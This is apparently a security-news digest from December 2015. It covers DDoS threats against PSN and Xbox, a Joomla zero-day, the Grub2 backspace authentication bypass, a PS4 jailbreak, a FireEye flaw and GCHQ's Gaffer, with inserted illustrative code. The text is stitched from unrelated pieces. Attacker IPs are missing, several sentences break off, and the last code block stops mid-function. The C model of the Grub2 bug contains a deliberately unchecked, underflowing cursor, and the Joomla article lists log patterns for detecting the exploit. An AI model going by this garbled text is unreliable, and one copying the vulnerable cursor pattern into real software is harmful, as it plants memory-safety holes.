Phantom Squad claims not to be linked with Lizard Squad, and declares itself a group of gray hat hackers that, like the popular Anonymous collective, has declared war on the Islamic State group.

Elsio Pinto (@high54security) is at the moment the Lead McAfee Security Engineer at Swiss Re, but he also has knowledge in the areas of malware research, forensics and ethical hacking. He has had previous experience in major institutions, the European Parliament being one of them. He is a security enthusiast and tries his best to pass on his knowledge. He also owns his own blog.

Hackers Plan to Ruin Christmas Eve for Millions of PlayStation and Xbox Live Gamers
Remember the notorious hacker group Lizard Squad that spoiled last Christmas holidays of many game lovers by knocking the PlayStation Network and Xbox Live offline with apparent Distributed Denial of Service (DDoS) attacks?
But, Will you be able to Play Xbox and PlayStation Game this Christmas?
Probably Not.
Because a new hacking group is threatening to carry out similar attacks by taking down the Xbox LIVE and PlayStation Network for a week during Christmas.
Be Ready this Christmas for Attacks on PSN and XBox LIVE
In a series of tweets, a bunch of DDoS hackers calling themselves "Phantom Group" (@PhantomSquad) announced that they will disrupt the XBox Live and PlayStation networks in a coordinated DoS attack.
The attacks could prevent millions of gamers worldwide from enjoying their newly opened Christmas gifts and accessing games online.
Here are the tweets by Phantom Squad:
We are going to shut down Xbox live and PSN this year on Christmas. And we are going to keep them down for one-week straight #DramaAlert
Ok, think about this.... Xbox Live and PSN have millions upon millions of dollars... but do they use that money for better security?
No. PSN and Xbox do not use that money to improve their security... So until they open their eyes, Xbox Live and PSN will remain vulnerable.
Take Phantom Squad's Threats More Seriously
A few days ago, Phantom Squad claimed responsibility for knocking Reddit offline, and Reddit confirmed the issue, saying its databases had come "under extreme load", which could have been caused by a DDoS attack.
"Reddit #Offline Goodnight." — Phantom Squad tweeted on December 15, 2015.
Now, the group has turned its crosshairs toward the gaming networks.
However, neither Microsoft nor Sony, which manage the Xbox Live and PlayStation online networks, has confirmed the DDoS attacks, but Microsoft, at least, acknowledged issues with Xbox LIVE when Phantom Squad claimed responsibility.
"Xbox Live #Offline" — Phantom Squad tweeted on December 12, 2015.
As proof, Phantom Squad also posted a video of its cyber attacks.

If the DDoS attack on PSN and XBox is carried out successfully for a week during Christmas, it will again ruin the Christmas holidays for millions of video game lovers worldwide, just like last year.
Since DDoS attacks are so easy to conduct nowadays when there are so many DDoS tools available online, the important point here is whether Microsoft and Sony have upgraded their DDoS defences enough to defend against the attacks.
So, What do you think about the declarations of war upon PSN and Xbox LIVE? Share your thoughts with us in the comments below.

Joomla under attack due to a zero-day. Patch your CMS now!

The websites based on the popular Joomla CMS need to be updated as soon as possible due to a critical remote code execution vulnerability.
The websites based on the popular Joomla CMS need to be updated as soon as possible: Joomla has just released a security patch to fix a critical eight-year-old remote code execution vulnerability. The critical flaw was already being exploited in the wild; during the weekend, experts at the Sucuri firm observed an alarming increase in the number of attacks.

According to security expert Daniel Cid from Sucuri, starting from Saturday hundreds of attacks have been taking place.

“What is very concerning is that this vulnerability is already being exploited in the wild and has been for the last 2 days. Repeat: This has been in the wild as a 0-day for 2 days before there was a patch available.” states the blog post published by Sucuri.

“The wave of attacks is even bigger, with basically every site and honeypot we have being attacked [which] means that probably every other Joomla site out there is being targeted as well.”

The zero-day flaw could have a significant impact on the Internet users considering that Joomla is the most popular content management system having been downloaded more than 50 million times.


According to a security advisory published by Joomla, all versions above 1.5 are affected. It is important to update the CMS version to the patched version 3.4.6.

“Browser information is not filtered properly while saving the session values into the database which leads to a remote code execution vulnerability,” it says.

Sucuri is inviting users to protect their websites and to look for possible indicators of compromise. The attackers are running object injection through the HTTP User-Agent header, with exploits from the IP address,, and

“If you are a Joomla user, check your logs right away. Look for requests from or or as they were the first IP addresses to start the exploitation. I also recommend searching your logs for “JDatabaseDriverMysqli” or “O:” in the User Agent as it has been used in the exploits. If you find them, consider your Joomla site compromised and move to the remediation / incident response phase.” states Sucuri.

Don’t waste time: check your logs and update your Joomla version asap.

GCHQ Gaffer database goes open source

The British intelligence agency GCHQ has released the Gaffer database as an open source project.
Gaffer is a sort of database, written in Java, that makes it “easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches.” Its code is available for download on the code-sharing website GitHub.

“Gaffer is a framework that makes it easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches. These statistics summarise the properties of the nodes and edges over time windows, and they can be dynamically updated over time.” states its description on GitHub.

In reality Gaffer is much more: it implements a framework for creating mass-scale databases and is a powerful tool for the storage and analysis of the relationships between different pieces of data.

“Gaffer is a graph database, rather than a graph processing system. It is optimised for retrieving data on nodes of interest.” continues the description “Gaffer is distinguished from other graph storage systems by its ability to update properties within the store itself.”

Gaffer implements features that:

Allow the creation of graphs with summarised properties within Accumulo with very little coding.
Allow flexibility of stats that describe the entities and edges.
Allow easy addition of nodes and edges.
Allow quicker retrieval of data on nodes of interest.
Deal with data of different security levels – all data has a visibility, which is used to restrict who can access data based on their authorizations.
Support automatic age-off of data.
Gaffer is based on Apache Accumulo, a software project that developed a sorted, distributed key/value store based on the BigTable technology developed by Google.

Accumulo was created in 2008 by the US National Security Agency and it is released under the Apache 2.0 license.

Gaffer is distributed under the Apache 2.0 license that allows anyone to modify or distribute it.

GCHQ against pedophiles
Security experts speculate that Gaffer is used by the GCHQ for analyzing data related to a specific entity that could be a terrorist or any other element under investigation.
“Each node might be a surveilled terrorist or other source of data, and analysis of the graph might then show who or what is at the ‘center’ of that network,” said Andrii Degeler, a journalist at Ars Technica.

It is impossible to know the motivation behind the release of the platform, but it is likely that the agency is trying to attract young talent from the hacker community.
GCHQ is currently working on Gaffer 2, as reported on GitHub:

“The version of Gaffer in this repo is no longer under active development because a project called Gaffer2 is in development. “

Press backspace 28 times to hack a Linux PC with Grub2

The researchers Hector Marco and Ismael Ripoll have found that the Grub2 authentication could be easily defeated by hitting backspace 28 times.
A couple of researchers from the University of Valencia’s Cybersecurity research group, Hector Marco and Ismael Ripoll, have found that the Grub2 bootloader is plagued by a serious vulnerability that can be exploited by hackers to bypass password protection and compromise the targeted computer.

Nothing complex: the researchers discovered that by pressing backspace 28 times, it is possible to bypass authentication during boot-up on some Linux systems.

The duo explained that the flaw affects the Grub2 bootloader, which is currently used by a large number of Linux machines, including some embedded systems, to load the operating system at startup.

The researchers explained in the advisory that hitting the backspace key 28 times at the Grub username prompt during power-up defeats the authentication mechanism; the action triggers a “rescue shell” under Grub2 versions 1.98 (December, 2009) to 2.02 (December, 2015).

“Exploiting the integer underflow can be used to cause an Off-by-two or an Out of bounds overwrite memory errors.” states the advisory. “An attacker which successfully exploits this vulnerability will obtain a Grub rescue shell. Grub rescue is a very powerful shell allowing to:

Elevation of privilege: The attacker is authenticated without knowing a valid username nor the password. The attacker has full access to the grub’s console (grub rescue).
Information disclosure: The attacker can load a customized kernel and initramfs (for example from a USB) and then from a more comfortable environment, copy the full disk or install a rootkit.
Denial of service: The attacker is able to destroy any data including the grub itself. Even in the case that the disk is ciphered the attacker can overwrite it, causing a DoS.“
An attacker can exploit the rescue shell to load another environment that allows him to fully compromise the machine, for example by installing a rootkit.

The integer underflow vulnerability affects Grub2 since 2009 and resides in the

“The fault (bug) is in the code of Grub since version 1.98 (December, 2009). The commit which introduced the fault was
, affecting the
function.” continues the advisory.


The duo also presented a proof-of-concept attack exploiting the flaw to inject a backdoor on the target system; fortunately, they have also released a fix that is available here.
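The integer underflow behind the 28-backspace bug, as described in both Grub2 items above, modelled in C as an added illustration of the bug class (this is not Grub’s source; the buffer size, function names and key sequences are hypothetical). An unsigned cursor decremented on every backspace wraps to UINT_MAX on the first backspace past zero, so 28 of them leave an index nowhere near the buffer; the hardened version makes backspace a no-op on an empty buffer.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical sizes for this model (not Grub's values). */
#define BUF_SIZE 64
#define BACKSPACE '\b'

/* Vulnerable model of the bug class: an unsigned cursor is decremented on
 * every backspace with no check for zero. On an empty buffer the first
 * backspace wraps cur_len to UINT_MAX, and a later buf[cur_len] write would
 * land far outside the buffer. To keep this model runnable, the writes are
 * guarded and the function returns the index it *would* have used. */
unsigned int unchecked_cursor(const char *keys, char *buf, size_t bufsize)
{
    unsigned int cur_len = 0;

    for (; *keys != '\0'; keys++) {
        if (*keys == BACKSPACE) {
            cur_len--;                     /* underflows when cur_len == 0 */
            continue;
        }
        if (cur_len < bufsize - 1)
            buf[cur_len++] = *keys;
    }
    if (cur_len < bufsize)                 /* guard only exists in this model */
        buf[cur_len] = '\0';
    return cur_len;
}

/* Hardened model: backspace on an empty buffer is a no-op, so cur_len can
 * never leave the range [0, bufsize - 1] and every write stays in bounds. */
unsigned int checked_cursor(const char *keys, char *buf, size_t bufsize)
{
    unsigned int cur_len = 0;

    for (; *keys != '\0'; keys++) {
        if (*keys == BACKSPACE) {
            if (cur_len > 0)
                cur_len--;
            continue;
        }
        if (cur_len < bufsize - 1)
            buf[cur_len++] = *keys;
    }
    buf[cur_len] = '\0';
    return cur_len;
}

/* Bounds predicate a reviewer can apply at any index-before-write site. */
int index_in_bounds(unsigned int idx, size_t bufsize)
{
    return idx < bufsize;
}

/* Run a key sequence through one of the two models on a scratch buffer. */
unsigned int cursor_for_keys(const char *keys, int hardened)
{
    char buf[BUF_SIZE];
    return hardened ? checked_cursor(keys, buf, sizeof buf)
                    : unchecked_cursor(keys, buf, sizeof buf);
}

/* Constructed input: n backspaces typed at an empty prompt. */
unsigned int cursor_after_backspaces(unsigned int n, int hardened)
{
    char keys[BUF_SIZE];
    if (n > sizeof keys - 1)
        n = sizeof keys - 1;
    memset(keys, BACKSPACE, n);
    keys[n] = '\0';
    return cursor_for_keys(keys, hardened);
}

int main(void)
{
    unsigned int bad = cursor_after_backspaces(28, 0);
    unsigned int good = cursor_after_backspaces(28, 1);

    printf("unchecked cursor after 28 backspaces: %u, in bounds: %s\n",
           bad, index_in_bounds(bad, BUF_SIZE) ? "yes" : "no");
    printf("checked cursor after 28 backspaces:   %u, in bounds: %s\n",
           good, index_in_bounds(good, BUF_SIZE) ? "yes" : "no");
    return 0;
}
```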

New security cloud will offer real-time data protection

17.12.2015 Protection
Kaspersky Lab has introduced its Private Security Network solution. Through this network its products can receive security data about applications and websites in real time, so they can provide extremely fast protection against new threats without having to exchange data with external servers.

In the conventional approach, updating the databases of a security solution usually takes a couple of hours; the cloud does it in a few minutes. This approach also saves computing resources, because the demanding analysis is performed in the cloud.

Before a security solution receives a verdict on whether a file or website is risky, however, it has to send information to the cloud. For some industries or certain countries this is not a viable option.

According to the vendor, Private Security Network works around this weakness. It is essentially a private cloud containing an internal copy of KSN (Kaspersky Security Network): the databases are installed on servers inside the company's own information infrastructure instead of the current model, in which the servers holding the security data are located in various countries.

Up-to-date threat information arrives in these databases from KSN through regular one-way synchronization, meaning that no data is sent from the corporate network to the cloud.

"Corporations and government institutions usually have very strict information security rules regulating both incoming and outgoing data traffic. Security solutions work most effectively when they maintain a continuous exchange of data with a cloud containing the latest threat data. The private security cloud will allow clients to take advantage of Kaspersky Security Network within their IT infrastructure, fully in line with their requirements and specific needs," said Nikita Shvetsov, Chief Technology Officer at Kaspersky Lab.

N3XT — Advanced CHIP that Could Make Your Computer 1000 Times Faster
Researchers have come up with an all new way to revolutionize the standard computer chip that comes inbuilt in all our electronics.
Researchers from Carnegie Mellon, Stanford, and the University of California, Berkeley among others, have invented a new material that could replace the 'silicon' in conventional chips – built in all electronic devices – making the device's processing speed 1,000 times faster.
This means that the new chip made with nano-material could solve complex problems in a fraction of the time our computers take.
The brand new chip, dubbed Nano-Engineered Computing Systems Technology (N3XT), takes the landscape from a resource-heavy single-storey layout to an efficient 'Skyscraper' approach, claims a Rebooting Computing special issue of the IEEE Computer journal.
Silicon Chip – A Resource-Heavy Single-Storey Layout
The standard silicon chips currently used in all electronic devices have one major issue:
The silicon chips are arranged like standalone houses in the suburbs.
This means these chips are single-storey, and each "house" in the neighbourhood is connected with wires that carry digital data.
The drawback of silicon chips is that the data in these chips travels longer distances and wastes energy, often causing digital traffic jams while processing.
N3XT Chip – Skyscraper Approach is 1000 Times Faster

N3XT chips are made from carbon nanotube transistors; carbon nanotubes are tiny cylindrical molecules of carbon that efficiently conduct heat and electricity.
The N3XT model splits processors and memory into, say, different 'floors' in a skyscraper.
All those floors are then connected by millions of tiny electronic elevators, called 'vias,' that are used to transport data between chips.
The big advantage of the skyscraper approach is that data moves much faster, and more efficiently, over shorter distances (vertically) than across a larger area (horizontally) as in current silicon chips.
"When you combine higher speed with lower energy use, N3XT systems outperform conventional approaches by a factor of a thousand," said H.-S. Philip Wong, the professor who authored the paper.
Another Advantage of N3XT Over Silicon Chip
Another advantage of skyscraper chips over silicon chips is that:
Silicon chips cannot be stacked on top of each other as N3XT chips can, because during fabrication a silicon chip gets extremely hot (almost 1,000 degrees centigrade), which would damage the layers below.
The N3XT chip, by contrast, can be fabricated at much lower temperatures than silicon chips, so it can easily be layered without damaging the stacks below.
It sounds like an entirely different approach to computer memory and, of course, this kind of computing knowledge is new to me. But, it's interesting to know that the approach could bring a macro-level revolution in chip architecture that took place more than a century ago.
You can check out the original report at Stanford News for more details, and let me know your take on it.

Hacker claims Sony PlayStation 4 Jailbreak

The dream comes true for many Sony PlayStation 4 users, a hacker has developed a Jailbreak for the popular armored console.
The Sony PlayStation 4 is considered one of the most protected platforms; until now it was impossible to run pirated games, but a hacker who calls himself CTurt claims to have developed a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit he previously created.


CTurt exploited the flaw in PlayStation 4 firmware v1.76 to inject malicious code into the PS4 and gain control of the gaming platform.

“Just broke WebKit process out of a FreeBSD jail (cred->cr_prison = &prison0). Guess you could say the PS4 is now officially “jailbroken” :P” states a Tweet sent by CTurt.


According to the above message, currently the exploit only works for PlayStation 4 firmware version 1.76, but the expert believes that it can be modified to work for more recent firmware.
How does it work?

According to the hacker, the jailbreak allows dumping the Sony PlayStation 4 RAM from other processes and allows the installation of a custom firmware, which could be exploited by hackers to run homebrew applications that are not normally allowed by the security restrictions implemented by Sony.

“While it could take time before CTurt and other hackers are able to develop custom firmware along with the method to load it on the video game console, it should be noted that the exploit can also be taken advantage of to have the console run pirated software.” reported

Clearly, if the news is confirmed, we will observe a huge impact on the gaming market.

What will Sony’s reply be?
Obviously, the company will analyze the exploit in order to discover the vulnerabilities exploited by the hacker and fix them in the most recent version of the PlayStation 4 firmware.

Twitter warns victims of state-sponsored attacks

Twitter has notified some of its users that they may have been targeted in an attack by state-sponsored hackers.
Twitter is warning users of state-sponsored cyber attacks: a small number of users, including a few connected to security and privacy advocacy, have been notified that their accounts were targeted by nation-state hackers.

The Twitter users received the notifications in their inboxes; the warning messages started a couple of days ago.

Twitter informed its users that hackers, likely associated with “a government,” were trying to compromise their accounts. The attackers were trying to steal users’ information, including email addresses, IP addresses and phone numbers linked to the accounts.

“We believe that these actors (possibly associated with a government) may have been trying to obtain information such as email addresses, IP addresses and/or phone numbers,” Twitter said in its notification.

“At this time, we have no evidence they obtained your account information, but we’re actively investigating this matter. We wish we had more we could share, but we don’t have any additional information we can provide at this time.”

According to Motherboard, coldhak, a Canadian “nonprofit dedicated to furthering privacy, security and freedom of speech,” first tweeted about the mysterious notification.


Colin Childs, one of the founding directors of coldhak, is a contractor for the Tor Project; this could be a possible motivation for the alleged attack.

Another user of the popular platform that received the notification is Runa Sandvik, a privacy and security researcher and a former Tor Project member.

Twitter reported that targeted users belong to organizations like the Electronic Frontier Foundation and the Tor Project.

Ironically, the company is recommending the use of Tor to protect online privacy, given that Twitter was accused in the past of blocking users who accessed its website via the anonymizing network and forcing them to verify their accounts by providing phone numbers.
This is the first time Twitter has warned its users of targeted attacks; in October Facebook launched a similar initiative warning its users of nation-state attacks, and back in 2012 Google launched its notification service.

It is not clear how Twitter and Facebook attribute the attacks to state-sponsored actors; in the case of Twitter’s warnings, it is also not clear whether the platform itself was hacked or whether the accounts were targeted individually.

FireEye Appliances affected by a critical flaw simply exploitable

Security experts at the Google Project Zero team have discovered a critical flaw in FireEye appliances that could be exploited via email.
A remote code execution vulnerability dubbed “666” affects FireEye appliances; attackers can exploit the flaw simply by sending an email or by tricking users into clicking on a link.

The 666 vulnerability resides in a module designed to analyze Java Archive (JAR) files, so an attacker can exploit it by sending a specially crafted JAR file across a network protected by FireEye appliances. The flaw was named “666” after its ID in the Project Zero bug tracker.

This can be done by sending an email containing such a JAR file to the targeted organization; notably, the email would not even have to be read for the malicious code to execute, because the appliance analyzes the JAR archive regardless.

Alternatively, the attacker can share with someone in the organization a link pointing to a crafted JAR file. FireEye appliances automatically scan files circulating on the network, and that same behavior can be abused to trigger the RCE vulnerability without user interaction.


“The FireEye MPS (Malware Protection System) is vulnerable to a remote code execution vulnerability, simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network,” states the advisory published by Project Zero. “This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc). This is about the worst possible vulnerability that you can imagine for a FireEye user, it literally does not get worse than this.”

FireEye appliances are used by enterprises to monitor internal networks; they can inspect FTP, HTTP, SMTP and other protocols, searching for potential threats.

The exploitation of the flaw could allow attackers to compromise networks protected by the security products.

This passive inspection is what made it possible for the RCE vulnerability found by the Google researchers to be exploited without user interaction.

Earlier this month, researchers Tavis Ormandy and Natalie Silvanovich of Google Project Zero announced the discovery of the critical flaw.

FireEye immediately worked to fix the security issue reported by the researchers.

The experts announced last week that they had developed a reliable exploit for a remote code execution (RCE) vulnerability affecting FireEye’s Malware Protection System (MPS).

“Because FireEye devices typically have a secondary internet-connected interface for updates and management, the issue could even be wormable across the internet,” Ormandy explained.

Of course, they avoided providing further technical details, but Ormandy noted on Twitter that the bug likely affected “every version ever shipped.”

According to Tavis Ormandy and Natalie Silvanovich, the issue affected FireEye’s Network Security (NX), Email Security (EX), Malware Analysis (AX), and File Content Security (FX) products. The experts at FireEye promptly patched the remote code execution (RCE) vulnerability within two days and even issued a temporary workaround within hours.

FireEye released the security content version 427.334.

The flaw discovered by the Google Project Zero team is not the only one: the experts also discovered a privilege escalation vulnerability that could have been exploited to obtain root access to a FireEye device.

The details of this second flaw have not been disclosed because the vendor is still working on a permanent fix.

The joint exploitation of the two flaws could allow a threat actor to compromise the internal network by deploying a stealthy rootkit on the affected appliance and siphoning sensitive data from the targeted hosts.

Top 10 — 2016 New Year's Resolutions for Cyber Security Professionals
Billions of dollars are spent in securing business operations, and yet attackers still find ways to breach a network.
With the ever-increasing growth in security attacks across all threat vectors, you should consider these New Year’s resolutions to help solve your security challenges in 2016:
Take stock of what you have
Segment your Network
Set up controls with ACLs
Secure protocols, network ports, & services
Monitor account activity
Monitor servers & databases
Make sure that your applications are secured
Ensure security policies are in place
Measure effectiveness and ensure your security products are doing their job
Add threat intelligence into your security operations
As you prepare for 2016 and reflect on all the security news stories from this year, these ten resolutions need to be on your “to-do” list:
1. Take stock of what you have
Knowing the genetic makeup of your environment is the key to securing your IT systems. It is critical to have an updated inventory of your systems, applications, and network devices as you cannot secure what you do not know about.
If you are starting up for the first time, you can use discovery inventory tools to create that initial inventory.
You should also consider using continuous discovery tools to identify what is connected to your private or internal network and what is connected to the public network or Internet.
As a best practice, you should use your inventory list and create device groups so that you can identify authorized users that perform critical tasks.
Eventually, feeding this information into a Security Information and Event Management (SIEM) product would help you to identify unauthorized access and mitigate threats before they become attacks.
2. Segment your Network
Managing network traffic and allocating bandwidth are typically seen as the main purposes of network segmentation, so its security aspects are often overlooked.
Adding new applications and making changes in the existing devices can drastically impact the security of your networks.
With proper segmentation in place, you will be able to apply appropriate security measures.
For example, the network that handles employees’ personal information and compensation details could be clearly separated from the one that handles your financial activities.
The key factors to consider when segmenting your networks should include:
knowledge of where your sensitive data resides
what applications and services your users need access to
capabilities of existing devices to implement segmentation
regulatory demands
how you will identify and respond when someone attempts to cross these boundaries
Based on this information you can allocate user and device permissions. Once you segment your networks based on required access, it will become easier for you to visualize how your devices interact across different segments and to identify suspicious activity.
3. Set up controls with Access Control Lists
Your firewalls and routers will permit or restrict data flow based on your ACLs. Ideally, you should be building your access control lists (ACLs) based on user need and in line with your segmentation policies.
You need to identify what type of controls are necessary for your applications and users.
With proper external ACLs, you can control IP spoofing in inbound and outbound traffic. For example, if incoming traffic shows a source IP that falls within your organization’s IP range, then it is suspicious. Similarly, if outbound traffic shows a source IP that does not fall within your IP range, then you have every reason to be suspicious.
You can make good use of IP whitelists by configuring your firewalls and routers to tell them how to handle incoming and outgoing traffic.
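As an added example (not from the article or any SolarWinds product), the two anti-spoofing rules above applied to a few constructed flow records: an inbound packet claiming a source inside the organisation's own ranges, or an outbound packet with a source outside them, is flagged. The address ranges are documentation placeholders, not real assignments.

```python
import ipaddress

# Constructed: the organisation's own public address ranges (placeholder values).
ORG_RANGES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.0/25"),
]

# Constructed sample flow records: (direction seen at the border, source IP, destination IP).
SAMPLE_FLOWS = [
    ("inbound",  "198.51.100.7", "203.0.113.10"),  # arrives from outside but claims an internal source
    ("inbound",  "192.0.2.44",   "203.0.113.10"),  # ordinary inbound traffic
    ("outbound", "203.0.113.10", "192.0.2.44"),    # ordinary outbound traffic
    ("outbound", "10.9.8.7",     "192.0.2.44"),    # leaves with a source we do not own
]


def is_org_address(ip: str) -> bool:
    """True if the address belongs to one of the organisation's own ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ORG_RANGES)


def classify_flow(direction: str, src: str, dst: str) -> str:
    """Apply the two external-ACL rules from the text to a single flow record."""
    if direction == "inbound" and is_org_address(src):
        # Ingress filter: nothing from the Internet should carry our own source addresses.
        return "suspicious: inbound packet claims an internal source (ingress spoof)"
    if direction == "outbound" and not is_org_address(src):
        # Egress filter: our border should only emit packets sourced from our ranges.
        return "suspicious: outbound packet with non-organisation source (egress spoof)"
    return "allowed"


def audit_flows(flows):
    """Return (src, dst, verdict) for every flow so the result can be reviewed or logged."""
    return [(src, dst, classify_flow(direction, src, dst)) for direction, src, dst in flows]


if __name__ == "__main__":
    for src, dst, verdict in audit_flows(SAMPLE_FLOWS):
        print(f"{src:>15} -> {dst:<15} {verdict}")
```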
4. Secure protocols, network ports, & services
Whether it’s sensitive personal information or financial data, the demand for security of electronic communication is high for both private and business use.
To protect and keep your data secure, you need to secure your application, transport, network, and data link layers.
To ensure the availability of your critical business services, monitor your endpoints and detect traffic over restricted services, ports and protocols to mitigate malicious activities such as:
malware infections that could enter via removable devices like USB drives
unauthorized port scans, as attackers often use this method to gain entry into your network
Communicate best practices to your users and let them know what is acceptable and what is not - especially in terms of using BYOD, transferring files, and using VPNs.
5. Monitor account activity
Access rights to your devices need to be controlled and monitored. Apply the concept of least privilege enforcement to avoid abuse of privileges.
It is highly recommended that you monitor accounts that are given administrative privileges and set rules to automatically log off or disable such an account if it is used to perform unauthorized activities.
For example, administrators can create local accounts with local administrative privileges. This is also something an attacker or malicious insider would do to ensure they can retain access even if they lose their privileged credentials.
Privileged accounts can, if unmanaged, lead to a lack of accountability and increase your chances of credential theft. Stolen credentials lead to compromised networks, which affect your customers, vendors and employees and eventually lead to loss of reputation.
6. Monitor servers & databases
Maintaining the integrity of sensitive information is vital. Keep track of changes made to files that contain business-critical information or system data.
Since attackers like to modify local files or registry settings in order to embed themselves, monitor these changes. Correlate file audit events with user activity and system changes to thwart an attack.
7. Ensure security policies are in place
When regulatory agencies come up with compliance policies and procedures, they are trying to help you know how to defend against attacks while also building customer confidence in doing business with your organization.
In reality, compliance standards will help you to identify ways to improve your IT infrastructure and act as a basis for your corporate security strategy.
For example, you should have clear internal policies when employees use their personal devices at work or when they use office devices/laptops at home.
These policies can help you prevent rogue users and devices from tampering with your data and network. In the case of mishaps, you should be able to take immediate action - remotely/automatically with your endpoint monitoring systems.
Implement change management for configurations of hardware and software on laptops, workstations, servers and network devices, to prevent policy violations and mistakes.
8. Make sure that your applications are secured
Patches are meant to plug security holes. You need to keep your systems patched with the latest updates from vendors so that you do not have known vulnerabilities that could create unwanted issues.
Attackers find their targets based on known vulnerabilities - so if patches are not applied on time, you may be making yourself an easy target.
You should have a good patch management strategy in place to protect your environment from threats and unwanted malware that could result in a security breach.
9. Measure effectiveness and ensure your security products are doing their job
It has become imperative to use multiple security systems such as anti-virus and IDS/IPS.
Each of these systems is specialized and performs specific security functions. But they operate in silos, which can create gaps in data correlation and leave your organization vulnerable.
So, how do you measure overall effectiveness and ensure that your security products are working as expected?
Consider using a SIEM with continuous log monitoring capabilities so you can consolidate and monitor logs from all devices centrally and help ensure the overall security of your environment.
Besides acting as a preventive measure, log monitoring also comes in handy for forensic analysis in the case of a security incident.
10. Add threat intelligence into your security operations
Threat intelligence data can help turn noise into actionable information to respond to attacks before a breach occurs.
Leverage this information with real-time event correlation to protect your environment from known bad actors.
As a best practice, send threat intelligence feeds into your SIEM since it’s the best solution for collecting, consolidating, and analyzing all of your log data and threat intelligence in one place.
A SIEM will help you detect attacks faster. Your SIEM should be able to alert you if it gets a match between threat intelligence (say, a bad actor IP address or URL) and what is happening on your network.
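As an added example (not from the article or any vendor's SIEM), the matching step described above in miniature: observables are pulled out of a few constructed firewall and proxy log lines and intersected with a constructed indicator set, producing one alert per log line that hits. The indicator values are documentation placeholders, not real IoCs.

```python
import re

# Constructed indicator feed; addresses and hostnames are placeholders, not real IoCs.
THREAT_INTEL = {
    "ip": {"192.0.2.99", "198.51.100.250"},
    "url": {"http://bad.example/download.exe"},
}

# Constructed log lines in a generic firewall/proxy style (not any real product's format).
SAMPLE_LOGS = [
    "2015-12-15T10:01:02Z fw01 ACCEPT src=10.0.1.5 dst=192.0.2.99 dport=443",
    "2015-12-15T10:01:09Z proxy01 GET user=alice url=http://bad.example/download.exe",
    "2015-12-15T10:02:11Z fw01 ACCEPT src=10.0.1.7 dst=93.184.216.34 dport=80",
    "2015-12-15T10:03:30Z fw01 DROP src=198.51.100.250 dst=10.0.1.5 dport=22",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://\S+")


def extract_observables(line: str) -> dict:
    """Pull every IPv4 address and URL out of one log line."""
    return {"ip": set(IP_RE.findall(line)), "url": set(URL_RE.findall(line))}


def correlate(lines, intel):
    """Return one alert per log line whose observables intersect the indicator set.

    Each alert records the raw line and the (kind, value) indicators that matched,
    so an analyst can see why the line was flagged.
    """
    alerts = []
    for line in lines:
        observed = extract_observables(line)
        hits = [(kind, value)
                for kind in ("ip", "url")
                for value in sorted(observed[kind] & intel.get(kind, set()))]
        if hits:
            alerts.append({"line": line, "hits": hits})
    return alerts


def hosts_by_indicator(alerts):
    """Summarise which internal hosts (src=... field) touched each indicator."""
    src_re = re.compile(r"\bsrc=(\S+)")
    summary = {}
    for alert in alerts:
        match = src_re.search(alert["line"])
        host = match.group(1) if match else "unknown"
        for _, value in alert["hits"]:
            summary.setdefault(value, set()).add(host)
    return summary


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOGS, THREAT_INTEL):
        print("ALERT", alert["hits"], "<-", alert["line"])
```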
Get Help Implementing These New Year’s Resolutions
If you need help with these 2016 New Year’s Resolutions, you really should check out these security products by SolarWinds.
For example, their Log & Event Manager is an easy-to-use SIEM that comes with:
log management,
automated security monitoring,
file integrity monitoring,
endpoint monitoring,
real-time event correlation,
and threat intelligence with active response capabilities.
You can perform forensic analysis and look for specific data across monitored devices with powerful searches.
With Log & Event Manager you can:
Gain key insight into critical activities and improve security, stay compliant, and solve problems in a single virtual appliance.
Turn log data into real-time intelligence with in-memory event correlation and detect suspicious activities before they can harm your environment.
Automatically respond to security threats and known bad actors with built-in active responses, which require no scripting.
Perform security audits and demonstrate compliance with predefined rules, templates and out-of-the-box reports.
Try Log & Event Manager - Download a free 30-day trial and have it up and running in less than an hour.

British Intelligence Open-Sources its Large-Scale Graph Database Software
The UK's secretive spy agency, Government Communications Headquarters (GCHQ), has open-sourced one of its tools for free on the code-sharing website GitHub...
A graph database called 'Gaffer.'
Gaffer, written in Java, is a kind of database that makes it "easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches."
GitHub is a popular code-hosting website that lets software developers build their projects on a single platform equipped with everything that goes into making software.
Gaffer and its Functionalities
In short, Gaffer is a framework for creating mass-scale databases to store and represent data, and is said to be useful for tasks including:
Allow the creation of graphs with summarised properties within Accumulo with very little coding.
Allow flexibility of stats that describe the entities and edges.
Allow easy addition of nodes and edges.
Allow quicker retrieval of data on nodes of interest.
Deal with data of different security levels – all data has a visibility, which is used to restrict who can access data based on their authorizations.
Support automatic age-off of data.
Gaffer is built on the Apache Accumulo codebase, which was originally open-sourced by the US National Security Agency (NSA), and is released under the Apache 2.0 licence.
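As an added illustration of the three ideas in the list above (summarised edge properties, a visibility label on every element, and automatic age-off), here is a tiny in-memory model written for this page; it is not Gaffer's own API, which is Java on Accumulo, and it simplifies visibility to a single label per element rather than Accumulo's boolean visibility expressions.

```python
from collections import Counter

HOUR = 3600


class SummarisedGraph:
    """In-memory stand-in for the Gaffer concepts described in the text.

    Edges are keyed by (source, destination, visibility). Adding the same edge again
    does not create a duplicate; it merges into the stored summary (count, hour-of-day
    histogram, last-seen time), which is what "summarised properties" means.
    """

    def __init__(self):
        self.edges = {}

    def add_edge(self, src, dst, timestamp, visibility):
        key = (src, dst, visibility)
        summary = self.edges.setdefault(
            key, {"count": 0, "hour_hist": Counter(), "last_seen": 0})
        summary["count"] += 1
        summary["hour_hist"][(timestamp // HOUR) % 24] += 1
        summary["last_seen"] = max(summary["last_seen"], timestamp)

    def edges_from(self, node, authorisations):
        """Summaries of edges leaving node, restricted to visibilities the caller holds.

        The visibility check is applied on every read, so a caller without the right
        authorisation never learns that the hidden edge exists at all.
        """
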